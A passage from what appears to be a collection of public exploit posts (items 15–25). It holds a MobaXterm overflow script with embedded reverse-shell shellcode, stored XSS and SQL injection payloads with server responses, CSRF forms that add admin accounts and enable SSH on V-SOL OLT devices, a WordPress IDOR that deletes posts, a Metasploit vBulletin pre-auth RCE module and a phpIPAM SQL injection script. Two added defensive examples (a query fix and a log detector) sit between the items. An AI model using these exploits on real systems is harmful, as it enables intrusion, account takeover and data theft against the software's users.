      # A0 is a badchar but the generated encoded shellcode won't use it
      # /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
      # /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
      # Shellcode 636 bytes
      shellcode = ""
      shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
      shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
      shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
      shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
      shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
      shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
      shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
      shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
      shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
      shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
      shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
      shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
      shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
      shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
      shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
      shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
      shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
      shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
      shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
      shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
      shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
      shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
      shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
      shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
      shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
      shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
      shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
      shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
      shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
      shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
      shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
      shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
      shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
      shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
      shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
      shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
      shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
      shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
      shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
      shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"

      crash = junk1 + nseh + seh + junk2 + alignment + shellcode

      # We need to maintain the MobaXterm sessions file structure
      sessions_file += crash
      sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"

      # We generate the file
      f = open( 'pwnd.mxtsessions', 'w' )
      f.write(sessions_file)
      f.close()

      print ("[+] pwnd.mxtsessions file created!")
      print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
  15. # Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
      # Google Dork: None
      # Date: 2019-09-14
      # Exploit Author: strider
      # Vendor: http://inoideas.org/
      # Software Link: https://github.com/inoerp/inoERP
      # Version: 0.7.2
      # Tested on: Debian 10 Buster x64 / Kali Linux
      # CVE : None

      ====================================[Description]====================================

      There is a security flaw in the comment section, which allows persistent XSS without any authentication.
      An attacker could use this flaw to gain cookies to get into an account of registered users.

      ====================================[Vulnerability]====================================

      extensions/comment/post_comment.php in the server part

      $$extension = new $extension;
      foreach ($field_array as $key => $value) {
        if (!empty($_POST[$value])) {
          $$extension->$value = trim(mysql_prep($_POST[$value]));   <-- escaping for htmlentities
        } else {
          $$extension->$value = "";
        }
      }

      includes/functions/functions.inc in the server part

      function mysql_prep($value) {
        return $value;   <-- just returns the value
      }

      ====================================[Proof of Concept]====================================

      Step 1: http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7
      Step 2: open a new question and submit it.
      Step 3: then paste the PoC code below into the comment field and submit it

      <img src=# onerror="alert(document.cookie);">
  16. # Exploit Title: thesystem 1.0 - 'server_name' SQL Injection
      # Author: Sadik Cetin
      # Discovery Date: 2019-09-26
      # Vendor Homepage: https://github.com/kostasmitroglou/thesystem
      # Software Link: https://github.com/kostasmitroglou/thesystem
      # Tested Version: 1.0
      # Tested on OS: Windows 10
      # CVE: N/A
      # Description:
      # Simple SQL injection after login bypass (login_required isn't used)

      POST /data/ HTTP/1.1
      Host: 127.0.0.1:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: multipart/form-data; boundary=---------------------------18467633426500
      Content-Length: 330
      Connection: close
      Referer: http://127.0.0.1:8000/data/
      Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
      Upgrade-Insecure-Requests: 1

      -----------------------------18467633426500
      Content-Disposition: form-data; name="csrfmiddlewaretoken"

      9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3
      -----------------------------18467633426500
      Content-Disposition: form-data; name="server_name"

      ' or '1=1
      -----------------------------18467633426500--

      HTTP/1.1 200 OK
      Date: Thu, 26 Sep 2019 12:16:11 GMT
      Server: WSGIServer/0.2 CPython/3.5.3
      Content-Type: text/html; charset=utf-8
      X-Frame-Options: SAMEORIGIN
      Content-Length: 190

      (23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')
  17. # Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting
      # Author: İsmail Güngör
      # Discovery Date: 2019-09-26
      # Vendor Homepage: https://github.com/kostasmitroglou/thesystem
      # Software Link: https://github.com/kostasmitroglou/thesystem
      # Tested Version: 1.0
      # Tested on OS: Windows 10
      # CVE: N/A
      # Description:
      # Stored XSS after login bypass (login_required isn't used)

      First of all, the following request is sent to the web server:

      POST /data/ HTTP/1.1
      Host: 127.0.0.1:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: multipart/form-data; boundary=---------------------------191691572411478
      Content-Length: 332
      Connection: close
      Referer: http://127.0.0.1:8000/data/
      Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
      Upgrade-Insecure-Requests: 1

      -----------------------------191691572411478
      Content-Disposition: form-data; name="csrfmiddlewaretoken"

      0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75
      -----------------------------191691572411478
      Content-Disposition: form-data; name="server_name"

      <h1>test
      -----------------------------191691572411478--

      Then the following request is sent to the web server:

      GET /show_search/ HTTP/1.1
      Host: 127.0.0.1:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: close
      Referer: http://127.0.0.1:8000/data/
      Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
      Upgrade-Insecure-Requests: 1

      # Finally, the response shows the stored XSS:

      HTTP/1.1 200 OK
      Date: Thu, 26 Sep 2019 12:25:19 GMT
      Server: WSGIServer/0.2 CPython/3.5.3
      Content-Type: text/html; charset=utf-8
      X-Frame-Options: SAMEORIGIN
      Content-Length: 176

      ('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>')
  18. # Exploit Title: thesystem App 1.0 - 'username' SQL Injection
      # Author: Anıl Baran Yelken
      # Discovery Date: 2019-09-26
      # Vendor Homepage: https://github.com/kostasmitroglou/thesystem
      # Software Link: https://github.com/kostasmitroglou/thesystem
      # Tested Version: 1.0
      # Tested on OS: Windows 10
      # CVE: N/A
      # Description:
      # Simple SQL injection after login bypass (login_required isn't used)

      POST /check_users/ HTTP/1.1
      Host: 127.0.0.1:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: multipart/form-data; boundary=---------------------------54363239114604
      Content-Length: 327
      Connection: close
      Referer: http://127.0.0.1:8000/check_users/
      Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
      Upgrade-Insecure-Requests: 1

      -----------------------------54363239114604
      Content-Disposition: form-data; name="csrfmiddlewaretoken"

      lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj
      -----------------------------54363239114604
      Content-Disposition: form-data; name="username"

      ' or '1=1
      -----------------------------54363239114604--

      HTTP/1.1 200 OK
      Date: Thu, 26 Sep 2019 12:40:24 GMT
      Server: WSGIServer/0.2 CPython/3.5.3
      Content-Type: text/html; charset=utf-8
      X-Frame-Options: SAMEORIGIN
      Content-Length: 34

      User:('test', '1234', 'test@test')
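Posts 15 to 18 share one root cause: user input is spliced into a query string (thesystem's `server_name` and `username`, where `' or '1=1` turns the WHERE clause true for every row) and stored text is later rendered as HTML (InoERP's `mysql_prep` returning its input unchanged, thesystem echoing `<h1>test`). The following is an added example, not code from either project: a string-built lookup beside the parameterised and output-encoded form a fix would use, against a `servers` table whose columns and rows are constructed here so it runs offline.

```python
"""Added example (not thesystem's or InoERP's code): string-built lookup
vs. bound parameters, plus output encoding at render time."""
import html
import sqlite3

# Constructed sample rows; the column names are assumptions, not the project's schema.
SAMPLE_SERVERS = [
    ("test", "192.168.1.4", "root"),
    ("web01", "192.168.1.5", "deploy"),
]


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's server list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE servers (server_name TEXT, ip TEXT, username TEXT)")
    conn.executemany("INSERT INTO servers VALUES (?, ?, ?)", SAMPLE_SERVERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, server_name: str) -> list:
    """String formatting: the quote in the input closes the literal and the
    remainder is parsed as SQL, which is exactly what "' or '1=1" relies on."""
    sql = f"SELECT server_name, ip, username FROM servers WHERE server_name = '{server_name}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, server_name: str) -> list:
    """Bound parameter: the value travels separately from the statement, so
    quotes in it never reach the SQL parser."""
    sql = "SELECT server_name, ip, username FROM servers WHERE server_name = ?"
    return conn.execute(sql, (server_name,)).fetchall()


def render_row(row) -> str:
    """Encode at output time: '<h1>test' is shown as literal text, not markup.
    (Escaping on the way into the database, as InoERP's comment suggests, is
    the wrong layer; the query needs parameters and the page needs encoding.)"""
    cells = "".join(f"<td>{html.escape(str(col), quote=True)}</td>" for col in row)
    return f"<tr>{cells}</tr>"


if __name__ == "__main__":
    db = make_db()
    probe = "' or '1=1"
    print("vulnerable:", lookup_vulnerable(db, probe))   # every row comes back
    print("fixed:     ", lookup_fixed(db, probe))        # no such server name
    print(render_row(("<h1>test", "192.168.1.5", "root")))
```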
  19. # Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download
      # Date: 2019-09-27
      # Author: LiquidWorm
      # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
      # Product web page: https://www.vsolcn.com
      # Affected version: V2.03.62R_IPv6
      #                   V2.03.54R
      #                   V2.03.52R
      #                   V2.03.49
      #                   V2.03.47
      #                   V2.03.40
      #                   V2.03.26
      #                   V2.03.24
      #                   V1.8.6
      #                   V1.4

      Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications.

      Desc: The device OLT Web Management Interface is vulnerable to unauthenticated configuration download and information disclosure vulnerability when direct object reference is made to the usrcfg.conf file using an HTTP GET method. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access.

      Tested on: GoAhead-Webs

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2019-5534
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php

      25.09.2019

      --

      # PoC

      1# curl http://192.168.8.200/device/usrcfg.conf
      2# curl http://192.168.8.201/action/usrcfg.conf
  20. # Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery
      # Author: LiquidWorm
      # Discovery Date: 2019-09-26
      # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
      # Product web page: https://www.vsolcn.com
      # Tested on: GoAhead-Webs
      # Advisory ID: ZSL-2019-5536
      # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
      # Affected version: V2.03.62R_IPv6
      #                   V2.03.54R
      #                   V2.03.52R
      #                   V2.03.49
      #                   V2.03.47
      #                   V2.03.40
      #                   V2.03.26
      #                   V2.03.24
      #                   V1.8.6
      #                   V1.4

      Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications.

      Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

      CSRF add admin:
      ---------------

      <html>
        <body>
          <form action="http://192.168.8.200/action/user.html" method="POST">
            <input type="hidden" name="user_name_add" value="Spy" />
            <input type="hidden" name="user_password_add" value="pass123" />
            <input type="hidden" name="password_confirm_add" value="pass123" />
            <input type="hidden" name="user_role" value="1" />
            <input type="hidden" name="user_name_mod" value="" />
            <input type="hidden" name="user_password_mod" value="" />
            <input type="hidden" name="password_confirm_mod" value="" />
            <input type="hidden" name="user_role_mod" value="0" />
            <input type="hidden" name="option_um" value="100/" />
            <input type="hidden" name="who" value="0" />
            <input type="submit" value="Init" />
          </form>
        </body>
      </html>

      CSRF enable SSH:
      ----------------

      <html>
        <body>
          <form action="https://192.168.8.200/action/sshglobal.html" method="POST">
            <input type="hidden" name="ssh_enable" value="1" />
            <input type="hidden" name="ssh_version" value="2" />
            <input type="hidden" name="auth_retries" value="6" />
            <input type="hidden" name="ssh_timeout" value="120" />
            <input type="hidden" name="ssh_modulus" value="2048" />
            <input type="hidden" name="who" value="0" />
            <input type="submit" value="Init" />
          </form>
        </body>
      </html>
  21. # Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
      # Google Dork: inurl:/wp-content/themes/zoner/
      # Date: 2019-09-24
      # Exploit Author: m0ze
      # Vendor Homepage: https://fruitfulcode.com/
      # Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
      # Version: 4.1.1
      # Tested on: Parrot OS

      ----[]- Persistent XSS: -[]----

      Create a new agent account, log in and press the blue «Plus» button under the main menu («Add Your Property» text will pop up on hover); you will be redirected to the https://zoner.demo-website.com/?add-property=XXXX page. Use your payload inside the «Address» input field («Local information» block), press the «Create Property» button and check your payload on the https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties page. Your new property must be approved by admin, so this is a good point to steal some cookies :)

      Payload Sample: "><img src=x onerror=alert('Greetings from m0ze')>

      PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties page.

      ----[]- IDOR: -[]----

      Create a new agent account, log in and create a new property. Then go to the https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties page and pay attention to the trash icon under your property info. Open the developer console and check out this code:

      <a title="Delete Property" href="#" data-toggle="modal" class="delete-property" data-propertyid="XXX"><i class="delete fa fa-trash-o"></i></a>

      Edit the data-propertyid="XXX" attribute, replacing XXX with the ID of the post or page you want to delete (you can get the post/page ID from the <body> tag class, e.g. postid-494, so the attribute for the post with ID 494 will be data-propertyid="494"). After you edit the ID, click on the trash icon and confirm the deletion (POST https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0). Funny fact: you can delete ANY post & page (!) you want; the security key is not unique for each request, so it's possible to erase all pages and posts within a few minutes.
  22. # Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation
      # Author: LiquidWorm
      # Discovery Date: 2019-09-26
      # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
      # Product web page: https://www.vsolcn.com
      # Tested on: GoAhead-Webs
      # Advisory ID: ZSL-2019-5538
      # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
      # Affected version: V2.03.62R_IPv6
      #                   V2.03.54R
      #                   V2.03.52R
      #                   V2.03.49
      #                   V2.03.47
      #                   V2.03.40
      #                   V2.03.26
      #                   V2.03.24
      #                   V1.8.6
      #                   V1.4

      Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications.

      Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

      Desc: The application suffers from a privilege escalation vulnerability. A normal user can elevate his/her privileges by sending an HTTP POST request setting the parameter 'user_role_mod' to the integer value '1', gaining admin rights.

      <html>
        <body>
          <form action="http://192.168.8.200/action/user.html" method="POST">
            <input type="hidden" name="user_name_add" value="" />
            <input type="hidden" name="user_password_add" value="" />
            <input type="hidden" name="password_confirm_add" value="" />
            <input type="hidden" name="user_role" value="0" />
            <input type="hidden" name="user_password_mod" value="test" />
            <input type="hidden" name="password_confirm_mod" value="test" />
            <input type="hidden" name="user_role_mod" value="1" />
            <input type="hidden" name="option_um" value="17" />
            <input type="hidden" name="who" value="1" />
            <input type="submit" value="Escalate" />
          </form>
        </body>
      </html>
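The three V-SOL advisories above (posts 19, 20 and 22) leave distinct traces in the OLT's web-server access log: a GET for usrcfg.conf that needs no session, and POSTs to /action/user.html or /action/sshglobal.html whose Referer is not the device itself. The following detection logic over such lines is an added example, not V-SOL's or Zero Science's code; the combined-with-Referer log format, the management address and the sample lines are assumptions constructed here.

```python
"""Added example: flag the V-SOL OLT config download and cross-site account
changes in access-log lines. The log format is an assumed combined format."""
import re
from urllib.parse import urlsplit

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Paths from the three advisories (ZSL-2019-5534, -5536, -5538).
CONFIG_PATHS = {"/device/usrcfg.conf", "/action/usrcfg.conf"}
ACCOUNT_PATHS = {"/action/user.html", "/action/sshglobal.html"}
OLT_HOST = "192.168.8.200"  # assumed management address (the one the PoCs use)


def classify(line: str):
    """Return a finding name for one log line, or None if it is benign or unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0]
    if m["method"] == "GET" and path in CONFIG_PATHS:
        # Reading usrcfg.conf needs no session, so any 200 means the config left the device.
        return "config-download" if m["status"] == "200" else "config-download-attempt"
    if m["method"] == "POST" and path in ACCOUNT_PATHS:
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host != OLT_HOST:
            # User/SSH changes submitted from another origin (or with no Referer)
            # are what the CSRF and privilege-escalation forms produce in a victim's browser.
            return "cross-site-account-change"
    return None


def scan(lines):
    """Return (finding, source address, path) for every line that matches a rule."""
    findings = []
    for line in lines:
        kind = classify(line)
        if kind is not None:
            m = LINE_RE.match(line)
            findings.append((kind, m["src"], m["path"]))
    return findings


# Constructed sample lines, not real device output.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Sep/2019:10:00:01 +0000] "GET /device/usrcfg.conf HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
    '192.168.8.15 - - [27/Sep/2019:10:01:10 +0000] "POST /action/user.html HTTP/1.1" 200 310 "http://attacker.example/olt.html" "Mozilla/5.0"',
    '192.168.8.15 - - [27/Sep/2019:10:02:00 +0000] "GET /action/user.html HTTP/1.1" 200 2200 "http://192.168.8.200/index.html" "Mozilla/5.0"',
    '192.168.8.15 - - [27/Sep/2019:10:02:30 +0000] "POST /action/sshglobal.html HTTP/1.1" 200 310 "http://192.168.8.200/sshglobal.html" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Sep/2019:10:03:00 +0000] "GET /action/usrcfg.conf HTTP/1.1" 404 0 "-" "curl/7.64.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A same-origin POST that flips `user_role_mod` (post 22) is indistinguishable from a legitimate edit at this layer; that one needs the application's own audit of who changed which account.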
  23. ##
      # This module requires Metasploit: https://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      class MetasploitModule < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'vBulletin 5.x 0day pre-auth RCE exploit',
            'Description'    => %q{
              vBulletin 5.x 0day pre-auth RCE exploit.
              This should work on all versions from 5.0.0 till 5.5.4
            },
            'Platform'       => 'php',
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'Reported by: anonymous',         # reported by
                'Original exploit by: anonymous', # original exploit
                'Metasploit mod by: r00tpgp',     # metasploit module
              ],
            'Payload'        =>
              {
                'BadChars' => "\x22",
              },
            'References'     =>
              [
                ['CVE', 'CVE-2019-16759'],
                ['EDB', 'NA'],
                ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
                ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']
              ],
            'Arch'           => ARCH_PHP,
            'Targets'        =>
              [
                [ 'Automatic Targeting', { 'auto' => true } ],
                # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
                # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
              ],
            'DisclosureDate' => 'Sep 23 2019',
            'DefaultTarget'  => 0))

          register_options(
            [
              OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
            ])
        end

        def check
          res = send_request_cgi({
            'method'        => 'POST',
            'uri'           => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
            'encode_params' => false,
            'vars_post'     => {
              'widgetConfig[code]' => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;",
            }
          })

          if res && res.body && res.body.include?('h4x0000r4l1f4')
            return Exploit::CheckCode::Vulnerable
          end

          Exploit::CheckCode::Safe
        end

        def exploit
          print_status("Sending payload.....")
          resp = send_request_cgi({
            'method'        => 'POST',
            'uri'           => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
            'encode_params' => false,
            'vars_post'     => {
              #'widgetConfig[code]' => "echo " + payload.encoded + "exit;",
              'widgetConfig[code]' => payload.encoded,
            }
          })

          #unless resp and resp.code == 200
          #  fail_with(Failure::Unknown, "Exploit failed.")
          #end
          #print_good("Success!")
          #print_line(resp.body)
        end
      end
  24. #!/usr/bin/env python3
      # Exploit Title: phpIPAM Custom Field Filter SQL Injection
      # Exploit Announcement Date: September 16, 2019 5:18 AM
      # Exploit Creation Date: September 27, 2019
      # Exploit Author: Kevin Kirsche
      # Vendor Homepage: https://phpipam.net
      # Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
      # Version: 1.4
      # Tested on: Ubuntu 18.04 / MariaDB 10.4
      # Requires:
      #   Python 3
      #   requests package
      # CVE: CVE-2019-16692
      # For more details, view:
      #   https://github.com/phpipam/phpipam/issues/2738
      #   https://github.com/kkirsche/CVE-2019-16692
      #
      # Example Output
      # [+] Executing select user()
      # [*] Received: [email protected]
      # [+] Executing select system_user()
      # [*] Received: [email protected]
      # [+] Executing select @@version
      # [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
      # [+] Executing select @@datadir
      # [*] Received: /var/lib/mysq
      # [+] Executing select @@hostname
      # [*] Received: ubuntu

      from requests import Session

      host = "localhost"
      login_url = f"http://{host}/app/login/login_check.php"
      exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

      credentials = {
          "ipamusername": "Admin",
          "ipampassword": "Password",
      }

      payload = {
          "action": "add",
          "table": "",
      }

      cmds = {
          "unpriv": [
              "select user()",
              "select system_user()",
              "select @@version",
              "select @@datadir",
              "select @@hostname",
          ]
      }

      if __name__ == "__main__":
          client = Session()
          resp = client.post(login_url, data=credentials)
          if resp.status_code == 200:
              for cmd in cmds["unpriv"]:
                  print(f"[+] Executing {cmd}")
                  payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
                  resp = client.post(exploit_url, data=payload)
                  info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
                  print(f"[*] Received: {info}")
  25. # Exploit Title: GoAhead Web server HTTP Header Injection.
      # Shodan Query: Server: Goahead
      # Discovered Date: 05/07/2019
      # Exploit Author: Ramikan
